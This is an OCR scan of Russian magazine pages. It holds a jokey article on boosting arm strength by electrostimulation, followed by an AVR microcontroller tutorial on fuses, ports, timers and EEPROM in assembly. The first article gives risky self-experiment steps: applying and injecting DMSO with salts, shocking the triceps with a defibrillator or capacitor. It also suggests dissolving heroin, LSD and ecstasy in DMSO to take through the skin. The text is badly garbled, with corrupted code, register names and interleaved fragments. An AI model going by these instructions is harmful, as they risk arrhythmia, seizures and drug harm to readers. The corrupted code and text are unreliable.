из них парные) «невооруженным глазом» можно увидеть лишь малую 
часть. Делятся они натри основныхтипа: веретенообразные (или ре- 
менные), перистые и сходящиеся (веерообразные). Ременные мышцы 
крепятся ксухожилиям с обоих концов и состоят из мышечных волокон, 
расположенных параллельно друг другу. Примером может служить, 
например, бицепс предплечья. Волокна перистых мышц крепятся к 
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сухожилию либо с одной 
его стороны, либо с двух. В 
анатомическом атласетакие 
мышцы похожи на большие 
перья, «черенком» которых 
служит сухожилие. 

Как правило, мышцы с па- 
раллельным расположением 
волокон (скажем, верете- 
нообразный бицепс) могут 
обеспечить больший диапазон 
движения вокруг сустава. Зато 
перистые мышцы создают куда 
большееусилие, посколькуу них 
ксухожилию обычно крепится 
больше волокон. 

Одни мышцы предназначены 
для того, чтобы создаватьусилие, 
другие — для «размаха». Но все они 
состоят из двух основных разно- 
видностей ВОЛОКОН: умеющих быстро сокращаться (тип ИА, N0 или ИХ, 
и ИВ, самые мощные) итаких, которые сокращаются медленно (тип I, 
обеспечивающий выносливость). Чем отличаются «быстрые» волокна от 
«медленных»? Тип волокна определяется той частью мышечной клетки, 
которая сокращается. А именно — протеином под названием «миозин». 
Чтобы лучше понять действие миозина, представьсебе гидравлический 
амортизатор автомобиля. Амортизаторы «Бентли» устроены так, чтобы 
«сглаживать» помехи при движении — машина движется ровно и 
плавно. В спортивном же автомобиле передача энергии амортизатором 
происходит быстро и прерывисто, чтобы водитель могсвоевременно 
и правильно отреагировать на помеху. Также работаюти разныетипы 
миозина — обеспечиваютбыстрое сокращение, высокую выносливость 
или некую комбинацию обоих факторов. От рождения у большинства из 
нас примерно поровну «быстрых» и «медленных» волокон. 

Понятно, что для настоящего роста мышц придется попотеть. Простое 
таскание штанги по спортзалу с вероятностью 99,9% не приведет ни к ка- 
кому результату, кроме потерянного времени и перманентной усталости. 
На самом деле, для роста мышц их нужно... повреждать! 

В научной литературе неоднократно описаны случаи, когда травми- 
рованные мышечные волокна гибли от полученных повреждений, но 



клетки-спутники, высвободившиеся 
из-под оболочки поврежденных волокон, 
активно делились. Сливаясь друг с другом, они [В 
образовывали новые мышечные волокна взамен 
утраченных. Такие процессы наблюдаются в мышцах Я 
людей, а в экспериментах надживотными отмечены не 
только факты регенерации отдельных волокон, но имеются 
и примеры регенерации целых мышц. Так, если у крыс в ||^Р 

условиях стерильности удалить мышцу, измельчить ее и затем 
измельченную массу уложить обратно в мышечное ложе, то ШЖ 
через некоторое время эта биомасса преобразуется в новую Ы 
мышцу, волокна которой формируются размножившимися клет- Ч 
ками-спутниками. Культуристы, конечно, не орудуют мясорубкой 
и скальпелем, но их специфические нагрузки как раз способству- 
ют постепенному повреждению волокон. 

Похоже, чтобы накачать мышцы, потребуется заняться самоистяза- 
нием! Но за чем тупо наращивать мясо на кости? Мы же не на разде- 
лочную кповару готовимся... Нам нужна Сила, какЛюку Скайуокеру. 

А потому — снова возвращаемся ктеме кардиостимуляторов. 

Самый примитивный способ стимулирования сердечной мышцы 
настолько прост, что его может смоделировать и первоклассник — только 
дайте емудвежелезки, пару проводов и генератор. Временная «внеш- 
няя» стимуляция представляет собой два пластинчатых электрода на 
поверхности грудной клетки, подключенных кэлектронике стимулятора. 
Один из электродов обычно располагается на верхней части грудины, 
второй — слева сзади, примерно на уровне нижних ребер. При прохож- 
дении электрического разряда через тело вызывается сокращение всех 
мышц, расположенных между пластинами, втом числе сердца и мышц 
грудной стенки. 

Естественно, что пациенте наружным стимулятором не может быть 
оставлен без присмотра на длительное время. Если он находится в 
сознании, то применение этого вида стимуляции вызовету него весьма 
существенный дискомфорт вследствие частого сокращения мышц груд- 
ной стенки. Промолчим уже и о случаях рассогласования внутренних 
сокращений мышц и навязываемых стимулятором импульсов... 



Н ДИСТРОФИК-СУПЕРМЕН 

Будем считать, что азы теории усвоены. Пора переходить к превраще- 
нию чахлого дистрофика в УберЗольдата. 

Жертвами усиления для простоты эксперимента выберем трицепс и лок- 
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тевую мышцу. Именно они идеально подходят для рубящего сабельного 
удара — а ведь самым впечатляющим приемом в боевом фехтовании 
является «разрубание врага от плеча до пупа» (с) Шолохов. В момент 



Другое наипрекраснейшее, сточки зренияторчка, свойство этого 
препарата заключается в его нетоксичности и, главное, великолепной 
способности быстро впитываться в кожу! Болеетого, сам по себе диме- 



начала движения руки вниз эти мышцы напрягаются постепенно, что 



упрощаетзадачу: при электростимуляции очень важно дать разряд вов- 
ремя, чтобы «войти в резонанс». Рука начала движение вниз, и локоть 
разгибается. Если прицепить два коротких электрода к предплечью и 
плечутак, чтобы при угле сгиба локтя менее 90 градусов они соприкаса- 
лись, то мы получим размыкающее реле — кактолько рука начнет раз- 
гибаться (собственно, удар), электроды разомкнутся. Фактически, этот 
разрыв цепи можно использовать каксигнал для разряда стимулятора. 
Все просто! 

Осталось придумать, как прикрутить электроды ктрицепсу и локтевой 
мышце... И тут на ум приходит старый фокус британских «кислотных» и 
тяжелых наркоманов. Примерно в 70-80х повальноеувлечение моло- 
дежи массовыми дискотеками и не менее повальные облавы полиции 
приучили дискоманов и битников изящно обходитьоральный мазок 
(таблетки во рту надолго оставляют следы наркотика, не смываемые 
даже многолитровой пивной «полировкой») и уж, тем более, не остав- 
лять следы отуколов героина. 

Секрет в том, что существует очень простой и несложно синтезируемый 
«суперрастворитель». Назовем его так, потому что он растворяет в себе 
как ионные, так и многие недиссоциирующие вещества: соли, парафи- 
ны, жиры, белок и т.д. В общем, если в воде вряд ли удастся растворить 
жир, а в масле — соль, то чудо под названием диметилсульфоксид 
(СН3-5О-СН3 — почти ацетон, только центральный атом углерода заме- 
нен на серу) растворит и то, и другое: одновременно и даже без хлеба. 



ИНСТРУКЦИЯ 
по АПГРЕЙДУ 

ДМСО МОЖНО НАЙТИ В НЕКОТОРЫХ АПТЕКАХ. ФИЗИОЛО- 
ГИЧЕСКИЙ РАСТВОР -ТАМ ЖЕ. ЖЕЛАТЕЛЬНО ПРОКОН- 
СУЛЬТИРОВАТЬСЯ У ВРАЧ А НАСЧЕТ КОНЦЕНТРАЦИИ ИОНОВ В 
КРОВИ. ДЕЛО ВТОМ, ЧТО ФИЗИОЛОГИЧЕСКИЕ РАСТВОРЫ МОГУТ 
БЫТЬ РАЗНЫХТИПОВ И С РАЗНЫМИ МАРКИРОВКАМИ. 

ДЛЯ СТИМУЛЯЦИИ ВОВСЕ НЕ ТРЕБУЕТСЯ ЦЕЛЫЙ ДЕ- 
ФИБРИЛЛЯТОР -ЭТО ВАРИАНТДЛЯ ЭСТЕТОВ, ДОПУ- 
ЩЕННЫХ К МЕДТЕХНИКЕ. ПРОСТОЙ КАРДИОСТИМУЛЯТОР, НА 
САМОМ ДЕЛЕ, СТОИТ НЕ ОЧЕНЬ ДОРОГО, НО БУДЕТ ДОСТАТОЧНО 
И БАНАЛЬНОГО КОНДЕНСАТОРА, ОТ КОТОРОГО ТЕБЯ «ДЕРГАЕТ» 
(НАВЕРНЯКА, БАЛОВАЛСЯ СТАКИМ В ДЕТСТВЕ). ЕДИНСТВЕННЫЙ 
НАСТОЯТЕЛЬНЫЙ СОВЕТ: НЕ ИСПОЛЬЗУЙ БОЛЕЕ 12 ВОЛЬТ. 

ВОЛ ШЕБНЫЙ ДМСО РАСТВОРЯЕТ МНОГО ЧЕГО: ПОЭТОМУ 
ВСЯ ПОСУДА ДОЛЖНА БЫТЬ ВЫЧИЩЕНА, ПРОМЫТА И, 
ЖЕЛАТЕЛЬНО, ПРОКИПЯЧЕНА. НЕЗАЧЕМ СОБИРАТЬ ВСЯКУЮ 
ДРЯНЬ В РАСТВОР, ПУСТЬ И СЛУЧАЙНО... 
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Втлично демонстри 
руют, насколько вяз 
ко клинок проходит 
Через пластилині 



Л'- 



Оперативно вкальм 
ваю ДМСО. ЧерезН 
три-четыре секунды 
можно снова рубить 
пластилин^^^^Н 



тилсульфоксид (ДМСО] является слабым болеутоляющим — растворяй 
хоть герыч, ЛСД и экстази со спиртом одновременно, капай поближе к 
вене и готовься к празднику... 

От радужных «глюков» перейдем копасностям. ДМСО позволит мне 
прокапать трицепс раствором солей для лучшей электропроводимос- 
ти мышечной ткани, а заодно и «увода» разряда оттех мышц, которые 
стимулировать не надо. Здесьтаится одна неприятность: баланс ионов К+, 
Ма+ и Са++ в человеческом организме оченьтонок. Сбой баланса может 
вызватьсерьезные нарушения, вплотьдо эпилептических припадков или 
аритмии сердца. Поэтому нужно аккуратно подбирать смесь солей или 
проводитьопытне чаще раза в неделю с последующим полным анализом 
крови. В идеальном случае проще всего найти в хорошей центральной 
аптеке с рецептурным отделом (там готовятлекарства «на заказ», а не 
продают готовые] полный физиологический раствор — в нем баланс солей 
выдержан великолепно. Достаточно выпарить его (но не до конца, так как 
в него добавляется глюкоза, которую легко спалить]. Кстати, глюкоза тоже 
пригодится для быстрого восстановления энергии трицепса. 

Итак— растворив нужные соли в ДМСО, прокапываем плечо сзади, за- 
хватывая весьтрицепс, берем управляемый дефибриллятор и устанав- 
ливаем на нем режим микростимуляции. Теперь подводим электроды к 
верхней и нижней части плеча (тоже сзади]. И начинаем наслаждаться 
Суперсилой! 

г ВСЕХПОРВЕМНАТРЯПКИ! 

В качестве подопытного кролика я использовал... детский пластилин! 
Вспомни сопливые детские годы, пластмассовые ножички, которые 
намертво вязли в пластилиновых брикетиках, вызывая отчаяние и 
ненависть клепке и скульптуре... Причем, холодный пластилин резался 



намного легче, чем теплый. Атеперь представь три таких брикета, 
уложенных друг на друга, и незаточенную парадную саблю морских 
пехотинцев США. Клиноксабли в 1 0 разтолще пластикового ножичка, 
а режущая кромка затуплена «в плоскость» шириной в почти два милли- 
метра. Застрянет он всенепременно, как ни пыжься и ни ори «кия» при 
ударе по злосчастному пластилину. Я умею пользоваться холодным 
оружием, однако даже для менятри брикетика оказались пределом... 
Конечно, можно медленно продавить хоть 30 брикетов, но нам же нужна 
сила удара, а не сила давления. 

Электростимуляция моментально расставила все по местам — удар ока- 
зался настолько резок, что клинок легко прошел аж через семь брикетов 
и зацепил восьмой! С первой попытки я получил трехкратноеусиление. 
Поскольку стимулирующий разряд дефибриллятора очень короткий, то 
в конце движениятрицепсуже был расслаблен — сабля двигалась по 
инерции, пробивая пластилин кинетической энергией. Это спасло мой 
локоть от вывиха сустава, хотя ощущения всеже были не из приятных. 
Тут помогли ДМСО и растворенная в нем глюкоза — боль быстро утихла, 
фактически, за считанные секунды. 

За один опыт я успел сделать около двадцати ударов без каких-либо 
последствий для руки. Пришлось, правда, пару раз вколоть еще раство- 
ра ДМСО (циркуляция крови в капиллярах мышц довольно быстро вы- 
мывает необходимые соли]. Можно было и не колоть, а снова прокапать, 
но я одновременно проверял и «скорострельность» удара. В реальном 
бою не будетвремени на расслабляющие медицинские процедуры, а 
при помощи обычного шприца я фактически довел время релаксации 
до менее чем трех секунд. Каждые три секунды я могу разрубать по од- 
ному противнику. Итого: 15-20трупов в минуту — такой эффективности 
не достигает даже классический пистолет! 

В технических вариантах это может быть очень дешевый крохотный 
прибор, которому вполне хватит пары пальчиковых батареек на 100- 
200 ударов. Достаточно вспомнить устройство современных фото- 
вспышек, чтобы убедиться в малой энергоемкости такого прибора. 
Можно вмонтировать в него съемный картридже раствором ДМСО 
и сразу закрепить электроды на жесткой пластиковой раме. И мы 
получим недорогой, практичный и устанавливаемый на руке за пару 
секунд при бор, напоминающий обычную защитную накладку. Он сам 
прокапает (точнее, проколет по принципу медицинского шприца -пис- 
толета] и даст разряд. 

Никто не мешает сделать подобные приборы и для мышц ног, позволяя 
увеличивать дальность прыжка раза в два-три... да вообще, никто не 
может мне помешать! С учетом киборгизации и телекинеза, которые я 
описывал в других своих статьях, через несколько летя стану Импе- 
ратором Мира, а вы все будете ползать передо мною на четвереньках 
и молить о пощаде. И, естественно, государственной религией будет 
фанатизм за футбольный клуб Уэльса «Кардифф Сити»! (Уменьшить 
гонорар, — Прим, ред.] 
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ЛИКБЕЗ по ПЕРИФЕРИИ 
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Судя по числу писем, тема контроллеров актуальна и интересна — каждый вто- 
рой спрашивал у меня, как реализовать на АѴР какую-либо функцию. Поэтому я 
решил не распылять усилия, а выложить подробный мануал по использованию 
того барахла, что разработчики из Аітеі насовали в свой микроконтроллер. 

В качестве примера опишу все на контроллере АТМедаб. Почему не АТМеда8535? 
А, для разнообразия. Чтобы, не замыкаясь на одном контроллере, наглядно пока- 
зать, насколько они похожи. 



в ВЕЛИКИЕ и УЖАСНЫЕ РЦ5ЕВІТ5 

В прошлых статьях я советовал тебе не лезть катим битам. И на то 
были свои основания. Неправильно выставив биты, ты можешь 
наглухо заблокировать контроллер для перепрошивки (или, вообще, 
какого-либо использования). Но без знания этой особенности конт- 
роллера далеко не уедешь. Так что, распишу все по порядку. У разных 
версий контроллеров число фьюзов разное, какие-то могут отсутст- 



вовать, но основные есть всегда. Вотпоними пройдемся. 
Конфигурационные биты находятся в особой области памяти и могут быть 
изменены только с помощью программатора при записи контроллера. 
Итак, главное! В АІтеІАѴР принята нотация — сброшенный в ноль 
Іизе ЬК считается активным. С одной стороны, это нелогично и криво, с 
другой — их контроллер, что хотят, то и делают. Поэтому просто запомни 
правило. 
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режимы работы выводов портаі 






Однако естьтакой популярный программатор — Ропу Ргод. Они там 
решили, что всехумнее и сделали все наоборот: в Ропу Ргод уже 
установленный битсчитается активным. Воз ни кает жутка я путаница! 
Поэтому надо быть внимательным, как никогда (иначе последствия 
могут быть печальными). 

Поумолчанию все контроллеры АѴР сконфигурированы так, чтобы рабо- 
тать от внутреннего источника тактов. За это отвечают биты СК5Е1. 
Выставив их правильным образом, можно выбрать частоту работы конт- 
роллера, а также источниктактового сигнала. 

СКЗЕЦЗ...О = 0000 

Внешний источниксигнала — на входХТАПІ подаются прямоугольные 
импульсы. Такое дел а ют в синхронных системах, когда несколько конт- 
роллеров работают от одного генератора. 

Чтобы запустить контроллер от внутреннего источника тактов, необходи- 
мо выставить СК5Е1 следующим образом: 

СКЗЕЦЗ...О = 0001 - 1МН2 
СКЗЕЕЗ...О = 0010 - 2 МНг 
СКЗЕЕЗ...О = ООН - 4 МНг 
СКЗЕЕЗ...О = 0100 - 8 МНг 
(обычно по умолчанию стоят такие) 

Иногда нужен внешний тактовый генератор, например, чтобы его под- 
страивать без вмешательства в прошивку. Для этого можно подключить 
РС-цепочку, как показано на схеме, и подсчитать частоту по формуле N 
1/ЗРС, где I будет частотой в герцах, а Р и С, соответственно, сопротивле- 
нием резистора и емкостью конденсатора, в Омах и Фарадах. 

СКЗЕЕЗ...О = 0101 — для частот ниже 0.9 МН 2 
СКЗЕЕЗ...О = ОНО - от 0.9 до 3 МН 2 
СКЗЕЕЗ...О = 0111 - от 3 до 8 МН 2 
СКЗЕЕЗ...О = 1000 - от 8 до 12 МН 2 




Р1А8Н РОМ ЕЕРРОМ 



Обращение к ЕЕРРОМ и ЕЕА5Н| 







СКЗЕЕЗ...О = 1100 или 1101 - от 0 , 9 до 3 МН 2 
СКЗЕЕЗ...О = 1110 или 1111 - от 3 до 8 МН 2 

Аесли ОКОРТ равен О? В этом случае, притехжезначения 0К5ЕЕ, имеет 
смысл поставить кварцот 1 до І 6 МН 2 . Разумеется, кварц на І 6 МН 2 мож- 
но по ста вить толь ко на Мегу без индекса «Е». 

Отоитупомянуть бит50КВІѴ8, которого нет в Аітедаб, но который часто 
встречается в других контроллерах АѴР. Это — делитель частоты. Когда 
он установлен (т.е. в нуле), то частота, выставленная в битах СК5ЕЕ0...3, 
делится на 8 — на чем в свое время застрял сШпу), долго пытаясь понять, 
почему у него западло не работает. Прелесть в том, что этот делитель 
можно отключить программно, записав в регистр СЕКРР нужный коэф- 
фициент деления, например,!. 

Бит Р5ТПІ5ВЕ способен превратить линию Резеі: в одну из ножек порта, 
что порой очень нужно, когда на какой-нибудь крошечной Тіпу не хватает 
ножек на все задачи. Но надо помнить, что, если отрубить Резеі:, то ав- 
томатически отваливается возможность прошивать контроллер по пяти 
проводкам. И для перешивки потребуется высоковольтный параллельный 
программатор, который стоит несколько тысяч. На коленке сделать его 
проблематично, хотя и возможно. Я выложу на наш диск простенький НѴ- 
программатор для восьминогих контроллеров Тіпу! 1 -Тіпу! 5; надо будет 
— спаяешь. 

Второй подлый бит — это 5РІЕМ. Если его поставить в 1 ,то возможность 
прошивать «по-простому» тоже мгновенно отваливается. Опять потребу- 
ется параллельный программатор! 

ѴѴПТОМ отвечаетза Собачий Таймер, онже — ѴѴаІсЬ Под. Этоттаймер 
перезагружает процессор, если его периодически не сбрасывать 
(профилактика зависаний). Поставишь ѴѴПТОМ в О, и «собаку» вообще 
нельзя будет выключить. 

Остальные биты особо тебе пока не нужны. Можешь их нетрогать или 
почитать баФзЬееІ: на предметтого, что они значат. 



Проблема внутреннего генератора и внешних ВС-цепочекобычно в 
нестабильности частоты, и если сделать на ней часы, то они будут врать 
— несильно, побудут. Поэтому бывает полезным запустить контроллер 
на кварце. Кроме того, только на кварце можно выдать максимум часто- 
ты, а значит, и производительности проца. 

СКЗЕЕЗ...О = 1001 — низкочастотный «часовой» кварц. На не- 
сколько десятков килогерц. 

Для обычных кварцев ситуация несколько отличается. Тут максималь- 
ная частота кварца зависиттакже и отбита СКОРТ. Когда СКОРТ = 1 (по 
дефолту), ТО: 

СКЗЕЕЗ...О = 1010 или 1011 - от 0 , 4 до 0 . 9 МН 2 



Н ПОРТЫ — ЭТО ПРОСТО 

Почти все выводы микроконтроллера являются выводами портов. 
Собственно, назначение контроллера: дрыгать этими портами по своему 
усмотрению, управляя всяким барахлом, что на нихзаботливо повесил 
разработчикдевайса. Режим работы вывода порта определяется регис- 
трами ППРх, РОРТх и РІМх. 

Каждый бит регистра ПНР указывает, в каком направлении работает 
соответствующая ножка порта: если в разряде «О», то эта ножка работает 
на вход, а если «1 » — на выход. Выставляется обычно все один раз — в 
моментинициализации порта в начале программы. 

В зависимости от регистра ППР, регистр РОРТ можетлибо определять 
тип входа, либо, если нога настроена в ППР на выход, выдавать в ножку 
«1 » или «О». 
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[Байт пришел. Работает!! 



Регистр РІМ содержит значение состояния ножек порта, когда тот 
работает на вход. 

Кратко распишу режимы работы портов. 

□ ОР = О, РОРТ = О — вывод порта работает в режиме И\-І, о котором я уже 
писал в статье «Электронные исходники». Напомню, вывод прикидыва- 
ется обрывом и никак не влияет на подключенную к нему линию. Однако 
он может чувствовать логический уровень на шине. Зачем? Например, 
тебе надо засниферить сигнал в проводе витой пары. Напрямую сделать 
это нельзя — наличие какого-либо активного девайса на линии вызовет 
невозможность передачи данных. Когда же ты вешаешьтуда ногу порта 
в режиме Ні-2,то — никакой разницы, данные по-прежнемутекут рекой, 
и ты их можешь спокойно считывать. 

□ ОР = ОРОРТ=1 — режим с подтягивающими резисторами (риКир). К 
выводу изнутри, через резистор, подается питание. В результате — на 
выводе слабая логическая единица. «Слабая» втом смысле, что ток 
через внутренний резистор течет крохотный, а значит, его можно легко 
придавить к нулевому уровню. 

Используется в тех случаях, когда надо получить сигнал от пассивного 
устройства, например, от кнопки. Вывод устанавливается в режим 
риКир и через кнопку замыкается на землю. Когда кнопка не нажата, 
подтяжка выставляеттам единичку (это можно наблюдать в регистре 
РІМ). А вот когда кнопку нажимают, то нога контроллера жестко замыка- 
ется на нулевой уровень, на землю, и в регистре РІМ будет ноль. 

□ ВР = 1 , РОРТ = О — на выходе будет нулевой уровень (земля). Тут все 
просто. Можно задавить, например, выводстипом риКирудругого кон- 
троллера, четко дав понять ему, что мы на этулинию выставляем ноль. 
Или дать питание светодиоду. Для этого светодиод, через резистор, 
плюсом подключаюткплюсу питания, а минусом — на вывод контролле- 
ра. Когда выставим ВОР = 1 и РОРТ = О, светодиод зажжется. 

ВВР = 1 РОРТ = 1 — ситуация прямо обратная: на выводе будет напряже- 
ние питания (или близкое к нему). Пригодится, чтобы явно указать, что 
мы хотим на этой линии видеть единицу и ни что иное. Им тоже можно 
зажечь светодиод, только подключить его надо будет плюсом к ноге, а 
минусом кземле. 

В последних двух режимах надо помнить, что если таким способом по- 
пытаться дать питание какой-либо мощной нагрузке (скажем, лампоч- 
ке), то великрискспалитьпорт контроллера кчертовой матери. Аесли 
одну итужелиниюсвязи два контроллера потянутв разные стороны 
— один жестко вверх, другой жестко вниз — то почти наверняка один из 
них сгорит. Максимальный ток, который может потянуть на себя ножка 
порта — не более 30 миллиампер. 

Н ВРЕМЯ ПОШЛО! 

Какзасечь время, чтобы ровно через секунду, послетого, какзнакомый 
прошел под датчиком, активировать магнит, который скинет на него 
ведро воды? Конечно, нужно использовать таймер. В контроллерах АѴВ 




таймеров существует целая пачка. Помимо отсчета временитаймер 
может служить счетчиком, подсчитывая перепады напряжения на 
ножке ТО или Т1 . Или даже генерировать ШИ М-сигнал. Проходя через 
конденсаторный фильтр, тот преобразуется в постоянное напряжение, 
зависящее от формы ШИМ-сигнала. Таймер представляет из себя 
встроенный в контроллер девайс, который, будучи однажды запущен- 
ным, начинает отсчет. А когда до с читает до максимума, то, во-первых, 
выставит битовый флажок в специальном регистре, а во-вторых, может 
перехватить управление на себя, вызвав прерывание. Управляется 
таймер внешними регистрами. Их я сейчас и распишу, на примере вось- 
миразрядного таймера номер ноль, контроллера Аіппедаб. 

Самый главный регистр — это ТСМТО (ТітегСоиМТ 0); он выступает счет- 
ным регистром, в котором происходит отсчет. Если нам нужно сделать 
задержку в 100 микросекунд, а таймер тикает со скоростью 
«1 тик в микросекунду», то в регистр ТСМТ нужно занести число 155. Так 
как максимальное число в восьмиразрядном регистре — 255, то от 1 55 до 
255пройдетровностотиковтаймера,а на 101 тике таймер выставит флаг 
переполнения и вызоветпрерывание. Если, конечно, емуэто разрешили. 
РегистрТССРО (Тіппег/СоипІегСопШоІ Редізіег) задает режим работы 
таймера. 

В самом простом случае (Аіппеда 8 ,ТітегО) активными будуттри последних 
разряда С502, С501 , С500. Режим работы они задают следующим образом: 

С302 . .СЗОО = 000 — счетчик остановлен (выключен и не 
работает) 

С302 . .СЗОО = 001 — счетчик работает, отсчитывая каждый 
такт процессора 

С302 . .СЗОО = 010 — работает, отсчитывая каждый восьмой 
такт процессора 

С302 . .СЗОО = 011 — работает, отсчитывая каждый 64 такт 
процессора 

С302 . .СЗОО = 100 — то же самое, но частота делится уже на 
256 

С302 . .СЗОО = 101 — а тут делится уже на 1024 (самый мед- 
ленно отсчитывающий режим) 

Если принять за данное, что длительность одно го такта на 8 МН 2 = 

1 ,25*1 0""-? секунды, то длительность одного такта в этом режиме будет 
порядка 1 , 2 * 1 секунды, а полный цикл пересчета от загрузки нуля 
до переполнения при числе 255 и прерывания — 0,032 секунды. Мало? А 
ты помножь это дело счетчиком на регистрах. 

Смотри, как можно сбацать секундную задержку. Для начала добавим 
прерывание на переполнение таймера номер ноль. Для Аітеда 8 это - 

.оке ОѴРОаббг; Тітег/СоипРегО Оѵег11о\т 
КДМР Тітег_оѵег ; Переход к обработчику 

Впиши эту бодягу в самое начало кода сразу после .іпсіисіе "тВсіеІ. 
іпс". Потом создай обработчик прерывания и где-нибудь в конце 

программы ДОПИШИ: 

Тітег_оѵег : 
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ЗЕТ 

ЕВІ Еіб , О 
оит ТССЕО ,ЕІб 
ЕЕТІ 



; Установили флаг Т 
; Выключили таймер 
; записав в контрольный регистр О 
; Возврат из прерывания. 




Когда таймер переполнится, сюда «прибежит» наша программа и ус- 
тановит флагТ. Это флагобщего пользования — он ни на что не влияет, 
поэтому его можно юзать для своих целей. 

Пораскинем мозгами. Нам надо 1 секунду и у нас частота 8МГц. Длитель- 
ность одного тика с максимальным делителем — 1 . 2*10“^ секунды. 
Чтобы получить 0.01 секунду, надо сделать 83 тика. Поэтому в регистр 
ТСМТО надо загрузить число 255-83 = 172. Тогда до переполнения 
будет ровно 83 тика. 

Получился КОД: 

Зесопсі: 

ЕВІ КІ7, 100 ; запомнили, что нам надо 100 интервалов 

по 0.01с 









// 



нительный бит ЕЕМѴѴЕ сбросится и его придется выставлять снова. Это 
сделано для защиты от случайной записи в ЕЕРЕОМ-память. 

Чтение происходит примерно аналогичным образом. Вначале ждем 
готовности памяти, потом заносим в регистры нужный адрес, а затем 
выставляем бит чтения ЕЕРЕ (ЕЕРВОМ Реаб ЕпаЫе) и следующей 
командой забираем из регистра данных ЕЕ О Р наше число, сохраняя его 
в любом регистре общего назначения. Для наглядности ятебе набросал 
две процедуры — на чтение и на запись. Чтобы записать байт, нужно в 
регистры Р16 и РІУзанести младший и старший байт адреса нужной 
ячейки, а в регистр Р21 — байт, который мы хотим записать. И вызвать 
процедуру записи. Аналогично с чтением: в регистра Р1 6 и Р1 7 — адрес, 
а в регистре Р21 должно бытьсчитанноезначение. 



ЕВІ Еіб , о 
ЕВІ Е17 , о 
ЕВІ Е21 , 45 
ЕСАЕЕ ЕЕШгіЕе 



загружаем адрес нулевой ячейки 
ЕЕРЕОМ 

и хотим записать в нее число 45 
вызываем процедуру записи 



Еоор : 

ЕВІ Еіб, 172 ; загрузили число 172 в общий регистр, 

т . к . в регистры 



ОВТ ТСЫТО , Еіб 
только так 
СЕТ 

пользования 
ЕВІ Еіб, 5 
тель 1024 
ОВТ ТССЕО , Еіб 



таймера нельзя ничего пихать напрямую, 
сбрасываем флаг Т — это флаг общего 
подготавливаем число 0000 0101 — дели- 
загнали это в контрольный регистр. Тай- 



мер запущен 



бѵ\?аіЕ : 

ВЕТС бѵ7аіб ; ждем пока флаг Т не встанет. По сути дела 
мы крутимся в бесконечном цикле . 

; Команда ВЕТС — это переход, если флаг Т не установ- 
лен. Флаг Т установится, когда произойдет переполнение 
счетчика и вызовется прерывание, в котором мы написали 
код, устанавливающий флаг Т. Но прерывание каждые 0.01 
секунду, а нам надо 1 секунду. Поэтому надо сосчитать 
100 прерываний 



ВЕС ЕІ7 ; Уменьшаем счетчик интервалов на 1 

ВЕНЕ Еоор ; Если не ноль — переход на метку Еоор 

Со счетчиками работать одно удовольствие, но восьмиразрядный 
слабоват для больших задержек. Поэтому тут лучше заюзатьТітег 1 . 

Он шестнадцатиразрядный, а значит, не потребуется дополнительный 
пересчет. Хватити одного таймера. 

г ЗАПОМНИ ЭТО! 

Иногда нужно сохранить данныета к, чтобы они восстановились после 
перезагрузки контроллера. В этом тебе поможет ЕЕРРОМ (почти все 
контроллеры серии АѴВ имеют на борту некоторое количество этой 
памяти]. Физически и логически эта память находится в отдельном 
адресном пространстве, а чтение из ЕЕРЕОМ и записьтуда осуществля- 
ется через специальные порты. 

Чтобы записать что-либо в ЕЕРРОМ, нужно в регистры адреса ЕЕАРН 
иЕЕАРЕІЕЕРРОМ Асігезз Редізіег] положить адрес ячейки, в которую 
мы хотим записать байт. Затем нужно дождаться готовности памяти к 
записи — ЕЕРРОМ довольно медленная штука. О готовности кзаписи 
нам доложит фла г ЕЕѴѴЕ (ЕЕРРОМ ѴѴгіІе ЕпаЫе]. Когда он будет равен 
О, — память готова кследующей записи. Оам байт, который нужно 
записать, помещается в регистр ЕЕОР (ЕЕРРОМ 0а1:а Редізіег]. После 
чего взводится предохранительный бит ЕЕМѴѴЕ (ЕЕРРОМ Мазіег ѴѴгіІе 
ЕпаЫе]. Теперь, в течение четырехтактов, нужно установить бит ЕЕѴѴЕ, и 
байт будет за писан. Если не успеешь выставить бит ЕЕѴѴЕ, то предохра- 



ЬВІ Кіб , о 
ЬВІ К17 , о 
КСАЬЬ ЕЕКеаб 



; загружаем адрес нулевой ячейки 
; ЕЕРЕОМ, из которой хотим прочитать байт 
; вызываем процедуру чтения. После кото- 



рой в Е21 будет считанный байт 



ЕЕШгіРе: 

ЗВІС ЕЕСЕ,ЕЕШЕ ; ждем готовности памяти к записи. 
Крутимся в цикле до тех пор , пока не очистится флаг ЕЕ1ДЕ 
КИМР ЕЕШгіРе 



СЕІ 

ОПТ ЕЕАЕЕ,Е1б 
ОПТ ЕЕАЕН,Е17 
ОПТ ЕЕВЕ,Е21 



затем запрещаем прерывания 
загружаем адрес нужной ячейки 
старший и младший байт адреса и сами 
данные, которые нам нужно загрузить 



ЗВІ ЕЕСЕ,ЕЕМѴ\[Е ; взводим предохранитель 
ЗВІ ЕЕСЕ,ЕЕШЕ ; записываем байт 
ЗЕІ ; разрешаем прерывания 

ЕЕТ ; возврат из процедуры 

ЕЕЕеаб: 

ЗВІС ЕЕСЕ,ЕЕШЕ 

; ждем, пока будет завершена прошлая запись 
ЕПМР ЕЕЕеаб ; также крутимся в цикле 
ОПТ ЕЕАЕЕ, Еіб ; загружаем адрес нужной ячейки 
ОПТ ЕЕАЕН, ЕІ7 ; его старшие и младшие байты 
ЗВІ ЕЕСЕ,ЕЕЕЕ ; выставляем бит чтения 

ІЫ Е21, ЕЕВЕ ; забираем из регистра данных результат 
ЕЕТ 




Память ЕЕРЕОМ маленькая (какие-то считанные байты], а иногда нужно 
сохранить кучу да иных, например, послание инопланетянам или табли- 
цу синусов, чтобы не тратить время на ее расчет. Да мало ли что нужно 
заранее сныкать в памяти! Поэтому данные можно забивать в память 
программ, в те самые килобайты флеша, что имеет контроллер на борту. 
Записать-то запишем, а как достать? Сначала туда надо что-либо 
положить — для этого добавляй в конце программы метку, например, 
«Саба» и после нее, используя оператор « . 6Ъ», вписывай свои данные. 
Оператор ОВ означает, что мы на каждую константу используем по байту. 
Есть еще операторы « . Оѵ^», задающие двухбайтные константы. 



баба: . бЬ 12,34,45,23 



Теперь метка баба указывает на адрес первого байта массива. Осталь- 
ные байты находятся смещением (просто добавляй к адресу единичку]. 
Кстати, есть одна ТОНКОСТЬ: адрес изначально указан в двухбайтных ело- 
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вах. Из-за этого он меньше в два раза, что надо учитывать. Для загрузки 
данных из памяти программ используется команда ІРМ Нп,І 
Она заносите регистр Рп число из ячейки, на которую указывает регис- 
тровая пара I. Напомню, что I — это два регистра: РЗО (21) и Р31 (2Н). В 
